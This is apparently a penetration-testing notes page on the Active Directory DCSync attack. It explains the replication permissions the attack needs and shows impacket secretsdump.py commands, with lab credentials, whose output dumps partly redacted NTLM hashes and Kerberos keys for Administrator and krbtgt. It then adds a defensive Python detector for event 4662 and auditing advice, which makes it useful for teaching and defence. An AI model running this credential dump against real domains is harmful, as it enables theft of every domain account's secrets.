# DC Sync Attack

{% embed url="<https://spookysec.net/2019-12-01-domain-controller-sync/>" %}

{% embed url="<https://www.c0d3xpl0it.com/2019/02/privexchange-one-hop-away-from-domain-admin.html>" %}

## Requirements

Within an Active Directory network, it’s useful to have a backup Domain Controller so that if your primary fails, you have a second one to fall back on. Perhaps if your workplace gets hit by ransomware, you may have a hot site so that you can be back up and running in a few minutes. These are all valid reasons that a user account might hold a very dangerous set of permissions called “**Replicating Directory Changes**”, “**Replicating Directory Changes All**”, and lastly “**Replicating Directory Changes in Filtered Set**”. This is commonly referred to as “DC Sync”, or Domain Controller Sync.

![](/files/-M0ziTr_glS56coPpa2f)

## Attack

We will primarily be working with the impacket tool “secretsdump.py” this time around. Access to any ordinary user account **will not suffice**; as described above, a user account with **Replicating Directory Changes** is required. This is what happens when a user account **without** these privileges attempts to perform the attack.

```
┌─[root@Sp00kyS3c]─[~/impacket/examples]
└──╼ #./secretsdump.py -dc-ip 10.13.37.10 spookysec.local/svc-demo:manager@10.10.10.123
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] DRSR SessionError: code: 0x20f7 - ERROR_DS_DRA_BAD_DN - The distinguished name specified for this replication operation is invalid.
[*] Something wen't wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up... 
```

If you’re not careful, this could trigger an Intrusion Prevention/Detection System alert.

With a **proper user account** this attack will likely succeed with ease.

```
┌─[root@MrS1n1st3r]─[~/impacket/examples]
└──╼ #./secretsdump.py -dc-ip 10.13.37.10 spookysec.local/backup:backup@10.10.10.123
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404 <snip> 3fe20cbe99b4a:::
Guest:501:aad3b435b51404eeaad <snip> 6ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad <snip> f978f125b2069292e327fbebe3:::
spookysec.local\svc-demo:1112:aad3b435b51404eeaa <snip> 9e372aa1f69147375ba6809:::
spookysec.local\backup:1113:aad3b435b5140 <snip> 4b40f1ca9aab45538:::
DC$:1008:aad3b435b51404eeaad3b43 <snip> 2208265f4726f8065a681:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:fcdd7ceb88389fc3 <snip> 7dfa150c1381872192eeb
Administrator:aes128-cts-hmac-sha1-96:4a9b79 <snip> 4557057eac
Administrator:des-cbc-md5:fe1f <snip> 793e57
krbtgt:aes256-cts-hmac-sha1-96:7107ca3bd17590 <snip> d980f3d1673dc20eaa8415
krbtgt:aes128-cts-hmac-sha1-96:57b394d <snip> dea239bfb08be
krbtgt:des-cbc-md5:e5320 <snip> 45f45b
spookysec.local\svc-demo:aes256-cts-hmac-sha1-96:effa9b <snip> e68f8d29647911df20b626d82863518
spookysec.local\svc-demo:aes128-cts-hmac-sha1-96:aed4 <snip> b0ae87030b3ff
spookysec.local\svc-demo:des-cbc-md5:2c4 <snip> 6ea0d
spookysec.local\backup:aes256-cts-hmac-sha1-96:23566872a9951102d1162 <snip> 4d61fda15d104829412922  
spookysec.local\backup:aes128-cts-hmac-sha1-96:843ddb2ae <snip> 971c836d197
spookysec.local\backup:des-cbc-md5:d601e9 <snip> 6d89
DC$:aes256-cts-hmac-sha1-96:a3c83bdaa420b48f <snip> b2733baae30d163c9fdb8
DC$:aes128-cts-hmac-sha1-96:96253e855598c <snip> 4fcbe22
DC$:des-cbc-md5:a7e34a <snip> d29f8
[*] Cleaning up... 
```
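The alert mentioned earlier has a concrete shape on the domain controller: a DCSync pull is logged as Security event 4662 whose Properties field carries the GUIDs of the replication extended rights listed under Requirements. The following is an added example, not code from the original page: a small Python filter that flags such events when the subject is not a known DC. The sample lines and the `DC$` allow-list are constructed; a real SIEM would hand you the parsed 4662 fields instead.

```python
# Added example (not from the original page): flag Security event 4662 entries
# where a principal other than a known DC exercised a directory replication right.
import re

# Extended-right GUIDs behind the three "Replicating Directory Changes" permissions.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Constructed sample events, flattened to one key=value line each. Account names
# mirror the walkthrough above: DC$ replicating is normal, "backup" is not a DC.
SAMPLE_EVENTS = [
    "EventID=4662 SubjectUserName=DC$ SubjectDomainName=SPOOKYSEC Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2};{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} AccessMask=0x100",
    "EventID=4662 SubjectUserName=backup SubjectDomainName=SPOOKYSEC Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2};{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} AccessMask=0x100",
    "EventID=4662 SubjectUserName=svc-demo SubjectDomainName=SPOOKYSEC Properties={bf967a86-0de6-11d0-a285-00aa003049e2} AccessMask=0x20",
    "EventID=4624 SubjectUserName=backup SubjectDomainName=SPOOKYSEC LogonType=3",
]

GUID_RE = re.compile(r"\{([0-9a-f-]{36})\}", re.IGNORECASE)


def parse_event(line):
    """Turn one key=value line into a dict (values contain no spaces here)."""
    return dict(kv.split("=", 1) for kv in line.split() if "=" in kv)


def replication_rights(event):
    """Names of the replication rights present in the event's Properties field."""
    guids = {g.lower() for g in GUID_RE.findall(event.get("Properties", ""))}
    return sorted(REPLICATION_RIGHTS[g] for g in guids & set(REPLICATION_RIGHTS))


def is_dcsync(event, dc_accounts):
    """True when a non-DC principal exercised any replication right (event 4662)."""
    if event.get("EventID") != "4662":
        return False
    if event.get("SubjectUserName", "") in dc_accounts:
        return False  # DC-to-DC replication is expected; allow-list the known DCs
    return bool(replication_rights(event))


def find_dcsync(lines, dc_accounts=frozenset({"DC$"})):
    """Return (subject, [right names]) for every suspicious replication event."""
    events = [parse_event(line) for line in lines]
    return [(ev["SubjectUserName"], replication_rights(ev))
            for ev in events if is_dcsync(ev, dc_accounts)]


if __name__ == "__main__":
    for subject, rights in find_dcsync(SAMPLE_EVENTS):
        print(f"possible DCSync by {subject}: {', '.join(rights)}")
```

Auditing event 4662 this way only works if "Directory Service Access" auditing is enabled on the DCs and the domain object's SACL audits Control Access; the allow-list of DC accounts should be generated from the domain, not hard-coded.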
